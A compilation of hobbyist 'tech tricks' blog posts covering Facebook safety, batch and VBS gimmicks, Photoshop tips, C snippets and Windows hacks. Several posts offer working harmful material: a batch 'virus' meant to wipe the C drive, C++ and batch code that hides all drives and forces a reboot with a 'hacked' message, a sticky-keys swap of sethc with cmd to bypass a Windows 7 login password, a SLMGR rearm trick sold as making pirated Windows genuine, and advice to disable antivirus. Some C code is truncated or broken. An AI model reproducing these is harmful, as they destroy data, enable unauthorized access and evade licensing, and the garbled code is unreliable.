Secure Facebook Account From Hackers

Facebook is the most popular social networking site one would come across. From kids, to oldies, Facebook is the talk around everywhere. With almost 900 million users registered in this social network ,Facebook is the one among the largest growing social media today. Though facebook claims to be very secure and difficult to hack , there are quite a few ways through which a hacker can easily hack into your account. Secure Facebook Account From Hackers
These ways are generally initiated by the user himself unknowingly.User id’sare vulnerable to being hacked by many, with various ways they find.  And so here are some measures you could take to keep your account safe from them. EMAIL ADDRESS
  •  Keep your email id hidden from everyone. Go to my profile, and personal i formation, and let you id be visible to only you.
  • Remove all your email addresses, and change the primary one as the one which is only known to you.
  •  For additional safety, use the secure browsing and send an email when logged into from another browser option active.
Keylogger is a virus that can be installed into your computer by a cracker, and keep a track of all the activities happening in there. It can be done remotely, and even more easily if the cracker has personal access to the system.
Phishing is the easiest way to trick users from logging in to the fake websites created. It takes just a few codes and a url, and some measures to not be detected as a fake one. Prevent yourself from phishing by some basic measures.To keep safe, never click in random urls, for they might be a spam. Always use Facebook’s homepage for logging in. Always use safe search. Report sites you find fishy.
To prevent keylogging, never click on fishy websites. Avoid use of pirated software’s, and tool bars that come for free. Use a strong antivirus, and keep a regular check on your system. Always make sure that the USB devices and other flash drives being used in your computer are secure.
Social engineering could involve any trick that could fool you into giving out your personal details. From your security questions in general discussion to mails that could be a spam, ir somebody from Facebook asking you to change your personal Facebook details to the one stated by them. Its all just a spam. BE AWARE.
To prevent yourself from being fooled in such tricks stay cautious all the time. Keep security question to which answers would remain confided to only yourself. Nobody from facebook would ever ask you to change your password or other personal details. Always remain extra careful, for such hackers are just around the corner searching for anybody they could victimize.Secure Facebook Account From Hackers

Matrix Effect Using Notepad

There will be a very few out there who haven’t seen The Matrix Trilogy and a very few who hate it.People who have seen the movie might have also seen this screen below many times!Matrix Effect Using Notepad

This is amazing right? Ever thought of recreating it in your computer? Well today i teach you how to do this.This is very simple and easy trick and all you need to have is the notepad and few lines of code.So heres how you do it:
  1. Open Notepad
  2. Copy paste these lines :
@echo off
color 02
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
3.Save this file as matrix.bat 
4.Now open this file and see matrix effect on your screen

Enjoy! :)

Create A Virus In Less Than 60 seconds

Everybody knows what a virus is. A person using a computer or laptop has faced  a virus attack atleast once in their life. Viruses are all man made. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus (depends on your antivirus actually 😉 ).Create A Virus In Less Than 60 seconds

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
                               @Echo off
                               Del C:\ *.* |y
    2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Awesome Photoshop tips for beginners

Photoshop is the most famous photo editing software. It allows you to make magical changes to the photos. It is best for touch ups and edits. It is also usefull for creative expression. However it is a complex software ,here are few quick Photoshop tips and tricks and quick look at some awesome tools that can help.

When you want to change the size of an image, rotate, flip or distort it, you can always do so by clicking Edit, then click Transform and select the action you desire. To make life easier, there’s a shortcut you can use. Simply press Ctrl + T on your keyboard and a bounding box will then appear around the image, indicating transformation. This means you can now resize your image. The best way to do so is by placing the cursor on one of the rectangle corners and then dragging the corner while holding the Shift key. When you’re finished just press Enter and you’re done.
To flip your image vertically or horizontally press Ctrl + T and then right click your mouses. A popup window will appear with a few options for rotating and flipping the image. Select the action you want and when you are done press Enter.
Awesome Photoshop tips for beginners

Similarly, to distort or skew the image press Ctrl + T and then place the cursor on one of the corners you want to distort. Press Ctrl while holding your mouse down on the corner and dragging it down to wherever you want, then press Enter to activate.
Awesome Photoshop tips for beginners

Batch Editing
If you have a bunch of photos to edit at once, make sure they are all in the same folder on your computer then open an image and record an action (Window > Actions). After creating an action, go to File > Automate > Batch then select the action that you just recorded. Click OK and Photoshop will open and play your action on all the images.
Awesome Photoshop tips for beginners

Change the Unit of Measurement
A short and quick way to switch between units of measurements is to place the cursor on one of the rulers (press Ctrl + R to show or hide the rulers), and right click, then choose a new unit from the context menu. You have a wide variety of units there, from centimeters to pixels, millimeters, points and even percents.
Awesome Photoshop tips for beginners

Enhance the Color Palette
If you have a photo that’s a little dull in color, you can cross it with a masterpiece, like the Mona Lisa or a Hopper painting, in order to get a cool result! Just select Image>Adjustments>Match Color and then select the famous painting or photo you’ve chosen. Hit OK and see how it turns out!
Awesome Photoshop tips for beginners
Magnetic Lasso Tool
This is an easy selection tool that helps you trace and outline a part of an image, and to separate it from the rest of the image in order to perform certain actions. For example, you can select and separate a product from its background.
The magnetic lasso tool detects the edges of an object, so it works best when you have a bold contrast between an object and its background with well defined edges. You can find this tool in the tools panel.
To access the Magnetic Lasso, click and hold your mouse button down on the Lasso Tool until a fly-out menu appears . The magnetic lasso is the last one with a small magnet on it’s icon. Select it and then go to your image and place your mouse on the edge of the part you want to select. Click your mouse once, release and just go over the edges of the object you want to select (just like you do with scissors when you cut something out).
Awesome Photoshop tips for beginners

Magic Wand Tool
The Magic Wand is another selection tool, ideal for when you are working with a background that is very monotone and consistent. If you have a clearly defined color that you want to choose in an image, this is the tool for you. For example, the Magic Wand is great when you want to select a white background or a clear blue sky.
Choose the magic wand tool from the tools panel and click on the part of the image you want to select. Make sure that you toggled the “add to selection” option on the top bar (icon of two squares) so you can keep on adding colors and tones to your selection.
Awesome Photoshop tips for beginners
Awesome Photoshop tips for beginners
Custom Shape Tool
The Tool Panel offers all the basic shapes you need like square, line, circle, ellipse etc. However, if you’d like to have extended options check out the custom shape tool. Represented by icon that kind of resembles a roadkill (but it’s far from it!) the custom shape tool is easy to find on the Options Bar. After you select it, a world of shape options will reveal itself to you.
A shape preview thumbnail will appear to the right of the Custom Shape Tool icon. The selection is great and you can access even more shapes by clicking again on the small arrow on the right side of the panel. If you are looking for banners, speech bubbles or arrows of all kinds, this is just the tool for you.
Awesome Photoshop tips for beginners
Awesome Photoshop tips for beginners
Adjustment Layers
As you use Photoshop for whatever purpose, like change colors of an image, make it sharper or improve the contrast, remember to always use the adjustment layers. The big advantage of the adjustment layer is that you don’t make the changes on the image itself but on a separate layer, so you can always change the settings to see which adjustment works best for you. You will find adjustment layers in the bottom of the the Layers Panel (a black and white circle icon).
Awesome Photoshop tips for beginners
Awesome Photoshop tips for beginners
Layer Styles
This is a simple & easy way to add some pizazz to your image. Layer styles are special effects that can be quickly applied to individual layers. All you have to do is double click on a layer and then choose the effect you like.
You can select from a whole variety of features, add a stroke or a glow, drop a shadow, and much more with just a click of the mouse. Be careful you don’t overdo it. These effects have a tendency to look cheap and sleazy when there’s too much of them.
Awesome Photoshop tips for beginners
Get Rid of Circle Trail Effect in Paintbrush
If you make long stroke with the paintbrush, you’ll notice that it creates a circle trail of pixelated color. In order to create a smooth stroke, select a brush and click F5 to open it. Select Brush Tip Shape and change the spacing from 25% to less than 7%. You can save the brush and select it from now on!
Awesome Photoshop tips for beginners
Spot Healing Brush
Yes – it’s exactly like it sounds, this tool will make everything look prettier! If you have a spot, blemish, or a mole this tool will remove it instantly. It can also be used as a pimple remover. Just place the brush over the area you want to “fix”, make sure the brush is a bit bigger than the blemish and click. Photoshop automatically samples from around the retouched area so you really don’t need to do anything else.
Awesome Photoshop tips for beginners
Dodge Tool
The Dodge Tool lightens pixels where you use it. This is a great solution for red “tired eyes”. Set the Dodge Tool to a soft brush, go to Range setting in the menu-bar’s pull-down and choose highlights, set Exposure on around 20%. Then carefully brush over the eye area. Remember not to overdo it, or your model will start to look like an alien. A few simple strokes should do the job.
Awesome Photoshop tips for beginners
Blur Tool
A simple and delicate way to remove small wrinkles is to blur them a bit. Use the Blur tool to smooth-out small imperfections like the wrinkles around the eye or mouth area and simply blur them into the background. Again, be gentle and remember not to overdo it or instead of improving your image you’ll end up spoiling it. The Blur tool can be used for repair as well as more artistic purposes so it’s important to become friendly with it.

Make GIF Animation In Adobe Photoshop

Learning Photoshop is a life goal for many people out there.Well, Today I am going to tell you how to make animated image (gif) in photoshop. Although, there are a lot of software available to do this, but photoshop is interesting one. Before using this trick, your system must have Adobe photoshop and adobe imageready installed.Make GIF Animation In Adobe Photoshop

Animation in Photoshop

  1. Open Photoshop 5.5 (any version) and create a new image file measuring 100 by 100 pixels. Set the resolution to 72 pixels per inch and the mode to RGB color.
  2. Choose Show Layers from the Window menu. This will bring up the Layers floating palette.
  3. Select the pencil tool. Use it to draw a picture.
  4. Click on the Layer palette’s submenu arrow and select Duplicate Layer.
  5. Click on the eyeball icon to the left of the bottom layer on the Layer palette. Use the pencil tool to add to the image on the top layer. Select the erase tool to remove part of the image.
  6.  Under the file menu, select Jump to, and then Adobe ImageReady 2.0. Save when prompted.

Animating in ImageReady

  1. Choose Show Animation from the Window menu. This will bring up the Animation floating palette.
  2.  Click on the Animation palette’s submenu arrow and select Make Frames from Layers.
  3. Use Save Optimized As to save the animation under a new name


Many PC keyboards usually have small LED lights to indicate the On/Off of certain keys like Num Lock, Caps Lock etc. Here I am once again with yet another simple trick which is indeed a cool one allowing your keyboard LED’s to be utilised  in a creative manner
This trick uses a simple Visual basic script which when activated makes your Scroll lock, Caps lock and Num locks LED’s flash in a cool rhythmic way which gives the perception of a live disco on your keyboard. (Sort-of)
To make your own live disco, follow the steps given below:-
1. Open Notepad in your PC.
2. Copy and  paste the exact code given below:-
Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
 3. Save the file as Disco.vbs or “*.vbs“.
Double click on the Saved file to see the LED lights on your keyboard go crazy.
NOTE: Antivirus will treat the .vbs file as a malicious program and will not let it execute. So its better to turn off your antivirus while u execute this.
This trick has been tested on Windows Vista and Windows 7 and is found to be working perfectly.
You can disable the keyboard disco by following these steps
1. Open Task Manager ( ctrl+alt+del )
2. Go to process tab
3. Select wscript.exe
4. Click on end process

Let us play with graphics in C

Many times my school mates come to me an said how bore to program in C . we are getting output on black  screen ,if we are using programming languages like VB we can play with graphics .what a hell it is not in our syllabus .so this post is dedicated to them. Let us play with C.colorful texts backgrounds,shapes ,animations ,different fonts etc and create what ever you want in your own passion ,Here for compiling this program I used TURBO C++ 3.0 . for getting graphical output on your windows 7 or windows 8 you can use the following ways ,
1.      Use DOSBOX ,download and install it, and configure it.
2.      Go to safe mode and open TURBO C++ compiler ,usually resolution will be comfortable to IDE
3.      Use windows xp, in virtual box or WM ware workstation
For implementing graphics in TURBO C++ 3.0 you have to use the header file “graphics.h” and the library file called “graphics.lib “ ,

First thing that we need to do before we can carry out any drawing activity is switch over the graphics mode . depending on the adapter and the monitor installed in your computer only some of graphics mode may available to you , display adapters are actually working in putting a picture on the screen .
To switch over to the graphics mode that offers best resolution we need to call the function initgraph() it will figure out the best resolution and puts the number corresponding to that mode in the variable “gm”, gm tells us which monitor are we are using ,and we need one more argument to this function say “gd” it is to mention device driver . Turbo C++  offers certain graphics drivers ,these are the files with extension BGI .depending upon what adapter we are using on of the adapter may get selected
So let us have a look on a sample program ,
 This program will change background color on each hit on any key in the keyboard 
# include <stdio.h>
# include<graphics.h>
# include <conio.h>
Void main()
 int gd=DETECT,gm,i;

Auto End Tasks To Enable A Proper Shutdown

Well are you tires of seeing this stupid dialogue box every time you turn off your PC
Auto End Tasks to Enable a Proper Shutdown
Well here’s a simple guide on how to remove this irritating problem and enable a proper shutdown:
  1. Copy the following into notepad.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] “ClearPageFileAtShutdown”=dword:00000001 [HKEY_USERS.DEFAULT\Control Panel\Desktop] “AutoEndTasks”=”1″ [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control] “WaitToKillServiceTimeout”=”1000″
  1. Save the file as shutdown.reg
  2. Double click the file to import into your registry.
This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.
NOTE: If your anti-virus software warns you of a “malicious” script, this is normal if you have “Script Safe” or similar technology enabled.

If you Don’t have a C Language Compiler , Download it here:
void swap(int& a, int& b)
a ^= b;
b ^= a;
a ^= b;
Note: This will not work if a and b point to the same variable.
In that case both will be reset to 0 after executing swap(a,b).
• To read till a comma:
scanf(“%[^,]”, a); // This doesn’t trash the comma
scanf(“%[^,],”,a); // This one trashes the comma
• To read a string:
scanf(“%[^\n]\n”, a); // It will read until you meet ‘\n’, then trashes the ‘\n’
• To skip input
If you want to skip some input, use * sign after %. For example you want to read last name from “Eby Jimmy” :
scanf(“%*s %s”, last_name); // last_name is a variable
It might sometimes be difficult to find errors in a huge program even if the lines are mentioned where the errors are present. So here is a simple way to solve that (if you have an internet connection onside).
When you get any compiler error, in the Error List Panel, you will see ERROR CODE along corresponding error. Write that ERROR Code with keyword “MSDN” in GOOGLE, and you will get a link on MSDN. In that link, you will find every detail on that error and information on how to fix it.
Some of you might have seen timer in VB, like if you set an interval and timer is enabled, it waits until the time is complete. Here is a basic code for timer in C Program.
#include <stdio.h>
#include <unistd.h>
int main() {
printf(“time elapsed\n”);
return 0;
As the name suggests, this code will list the entire numbers between a given range
For example:
#include <stdio.h>
int main()
int x = 10;
while( x –> 0 )
printf(“%d “, x);
The above code compiles and runs, listing the numbers from 9 to 0.

Create a Virus That Disable All Hard Disks

 In our previous posts we have taught you to make batch file virus. Now we will teach you to make a virus which will disable all the hard disks of your computer using C++ as well as batch file. Firstly I will give you a c++ program. As everyone isn’t aware of how to run C++ program. So for them I will give the same program in batch file. Copy the code in notepad.Save it as virus.bat.Run the batch file.Basic concept is same.
1. Open any c++ editor.
2. Copy and paste the following code.
#include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h >int main() { ofstream write ( “C:\\WINDOWS\\system32\\DisableHDD.bat” ); /*opening or creating new file with .bat extension*/ write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n”;
write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”;
 write<<“shutdown -r -c \”Sorry Your System is hacked by us!\” -f”<<“\n”;
write.close(); //close file
return 0;
3. Compile and run the program.
Below batch file contains the code that performs the similar job.
1. Open a notepad.
2. Copy and paste the following code.
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \”Hahahhaha! Your system is hacked by TTH!\” -f
3. Save it as “DisableHDD.bat”.
4. Double click the batch file to activate the virus.
WARNING: For educational purpose only. Run the virus at YOUR OWN RISK.

Make Windows Genuine Using Two Simple Steps

  Hey guys I would like to help you to make your MICROSOFT WINDOWS GENUINE .Most of us use pirated or cracked versions of Microsoft Windows. Mostly all the people around the world use these kind of version of windows (mainly in ASIA).This can be due to unavailability of the original copy or due to price issue or other various issues. But most of the people who use the pirated copies know the certain problems or errors they come to post the installation of the Windows.
One of the few error message is this
 The usual Message in pirated copies.
In this article I will show you how to make this pirated copy back to original.
I am sure you guys have heard of CMD/Command prompt. Using CMD we are going to make the windows genuine. My method consist of two steps(two simple steps).
We all know windows has a ability of auto installing its updates whenever it needs.Well the main reason how windows detects you are using a pirated copy is by this automatic update.Hence our first step is
STEP 1 (Turning Automatic Updates off):
(i)  Go to Control panel.
(ii) Click on system and security.
(iii) Click on Windows update>>Turn automatic updates on or off.
Control panel>>system and security
(iv)  Then make sure you did select “Never check for updates (not recommended) “.
You can disable automatic update.
Now some programming way.Lets get to the way in which the windows get genuine.
Follow the steps given below
Step 2: (Making Windows Genuine using CMD)
(i)Go to start button and type ‘run’ and open it.
(ii)Type ‘cmd’ in the search area.
(iii)Once Command prompt is open type this command “SLMGR -REARM”.
(iv)After that press enter key.
Type CMD command SLMGR -REARM.
(v)You will get a message like this below.
Message showing changes are made successfully.
(vi)Now you may restart your computer.
Well guys here you go with genuine MICROSOFT WINDOWS (No error messages.or any other disturbing issues).I doubt it will take you matter of less than a minute to complete the procedures. If you have any doubt regarding the procedure please don’t hesitate to give the problem hint in the comment box below.I would be glad to resolve them.
NOTE :To those who are facing “Access denied: the requested action requires elevated privileges” you need to run command with administrative privilege.You can do it in 2 ways.
1.Right click on cmd and select run as administrator and then execute command.
2.Enable system administrator account from local user and login to administrator account and execute command.
For user of windows vista,7, server 2012 and all in range of vista to 7 you can activate windows with OEM SLP keys and make windows genuine and can enjoy windows update too with no issue.

How to Hide Files / Folders Behind Images (Without Any External Softwares)

Normally, when we wish to hide some secret files, we save it inside folders of non-related names or by creating folder-inside folders. But what if we could hide it ‘behind’ some file say, an image file; things get much better, isn’t it?
This time in Techews’s Tips & Tricks, we are going to look into an interesting method to hide files or folders inside ‘jpeg’ images.
Note: Hiding a file inside an image implies that, when he opens the image, he will be able to see the picture but not the file. If we want to see the file hidden in it, we have to open it using another specific method.
Also Note: We are going to do this trick in Command Prompt (Cmd) in Windows Operating System.
Also, you MUST have any file compressing software like WINRAR,WINZIP or 7ZIP on your system before you proceed to the steps. STEPS TO BE FOLLOWED:
1) Select an image (preferably a jpeg image) to be used for hiding file behind the image.
2) Now select the file which is to hidden behind the image and convert it in ‘.RAR’ format using WinRAR or into ‘.zip’ format using WinZip / 7ZIP.
3) Paste both the files on desktop. (You may do this anywhere else too if you have more understanding on cmd command lines) .
4) Now open cmd. (Go to Start => All Programs => Accessories => Command Prompt)
5) Type  cd desktop  and press enter.
(We have now changed the directory to desktop)
6) After that type the command given below.
Copy /b name_image.jpg + name_file.rar  name_final.jpg
Replace name_image with the name of image you want your file to be hidden behind.
Replace name_file with name of your file you want to hide which is now in the compressed format(.zip or .rar) . (Do not mess up with the formats in the cmd.)
Replace name_final with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden at the end.
7) After typing the command , press enter.
8) The new image appears at the desktop. Note that the size of the new image will be equal to the sum of the size of the original image and that of the hidden file. Now, when you try to open this newly created image it will open as normal image. To open your hidden file, just open this file using Winrar or Winzip (whatever you have chosen) and extract it.
So simple isn’t it?
You can also use some softwares to do this if you think this method is too irksome. I would suggest the software named ‘Hide In Picture’ . Hide In Picture is a program that allows you to conceal files inside bitmap pictures, using a password.

How to hack into a Password Locked Windows 7 system using CMD

Most of the people use a secret password to secure their computer. Techews is back with it’s tricks, the first one of the year, but this time a bit “Wicked”. This article will help you geeks to Hack a password locked Windows 7 system using CMD. If you don’t know what is a CMD or what is the purpose of it, check this link for info: CMD-Command Prompt

This method will allow you to remove the existing password (which you have forgotten/don’t know) and reset the password to your like. It’s Simple but effective. Just follow the given steps properly.
Steps to be followed:

1) Make the system have a hard shutdown. This can be done by pressing the On/Off button on your computer while the “Starting Windows” screen is active. Do this as many times until you get the ‘Windows Error Recovery’ screen as shown below.
2) In it select the “Launch Startup Repair (recommended)” and a startup recovery option will appear on the screen.
3) Cancel the “Do you want to use System Restore?” prompt.

4) Wait until Windows has finished repairing your computer. This repairing process will not harm any files present in the system.

5) After waiting, a window will appear saying “Startup repair could not repair your computer.” You will also see an arrow pointing downwards in the bottom left corner (Problem Details). Click on it.
6) Scroll down and click the 2nd link. (Highlighted in the figure below)

7) After completing step 6, a Notepad will open up. Follow the given route shown in bold: File => Open => Computer => Local Disk => Windows => System32
8) Switch from Text Documents (*.txt) to All Files.

9) Now, in this folder, System32, find an application named sethc and rename it as sethc-bak (creating a backup file). Sethc is an application for the Sticky keys program and renaming it won’t do any harm to your computer.
Also, find the application named cmd and create a copy of it in the same folder(system32). Rename the copy file as sethc.
Picture9 (1)
10) Close all opened windows and select ‘Finish’ and Restart your system.

11) When the Password screen appears, hit Shift 5 times. Command Prompt(Cmd) with admin privileges is opened by doing so.
12) Enter this code into cmd: net user[username]* to change the [username]’s password. You will not be able to see the new entered password, so enter it wisely and carefully.

13) After you have successfully changed the password, you can close the cmd screen.
14) Enter the new password you’ve set in the password screen of Windows 7, that’s all, you will now successfully enter the system